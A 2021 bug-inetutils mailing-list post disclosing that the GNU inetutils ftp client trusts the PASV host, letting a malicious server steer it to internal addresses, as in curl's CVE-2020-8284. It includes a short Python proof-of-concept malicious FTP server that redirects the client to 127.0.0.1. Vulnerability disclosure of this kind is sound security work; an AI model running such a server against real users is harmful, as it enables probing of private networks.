bug-inetutils
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

scurity issue in inetutils ftp client

From: ZeddYu Lu
Subject: scurity issue in inetutils ftp client
Date: Fri, 11 Jun 2021 17:46:13 +0800

Last year, curl had a security update for CVE-2020-8284. more info, see https://hackerone.com/reports/1040166

The problem is ftp client trust the host from PASV response by default, A malicious server can trick ftp client into connecting back to a given IP address and port. This may make ftp client scan ports and extract service banner from private newwork.

After test FTP in inetutils GNU, I found the ftp client has the same problem.

Inetutils Version:

ftp (GNU inetutils) 2.0 Copyright (C) 2021 Free Software Foundation, Inc.

evil ftp server in python:

#!/usr/bin/env python3
import socketserver, threading, requests, subprocess,time, base64, secrets,sys, hashlib, os
 
class MyTCPHandler(socketserver.StreamRequestHandler):
    def handle(self):
        print('[+] connected', self.request, file=sys.stderr)
        self.request.sendall(b'220 (vsFTPd 3.0.3)\r\n')
 
        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr,flush=True)
        self.request.sendall(b'230 Login successful.\r\n')
 
        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'227 Entering Passive Mode (127,0,0,1,43,203)\r\n')
 
        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'227 Entering Passive Mode (127,0,0,1,43,203)\r\n')
 
        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'200 Switching to Binary mode.\r\n')
 
        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'125 Data connection already open. Transfer starting.\r\n')

        self.data = self.rfile.readline().strip().decode()
        print(self.data, file=sys.stderr)
        self.request.sendall(b'250 Requested file action okay, completed.')
        exit()
 
def ftp_worker():
    with socketserver.TCPServer(('0.0.0.0', 21), MyTCPHandler) as server:
        while True:
            server.handle_request()
threading.Thread(target=ftp_worker).start()
time.sleep(2)

After the victim type 'ls' in ftp client, it will request 127.0.0.1. Just like the attachment. It will request the user's interlnal network.

Python also fix this issue this year. Maybe this will help you. https://bugs.python.org/issue43285

More impacts you could find in https://hackerone.com/reports/1040166.

Attachment: Snipaste_2021-06-11_15-40-46.png
Description: PNG image

reply via email to
[Prev in Thread] Current Thread [Next in Thread]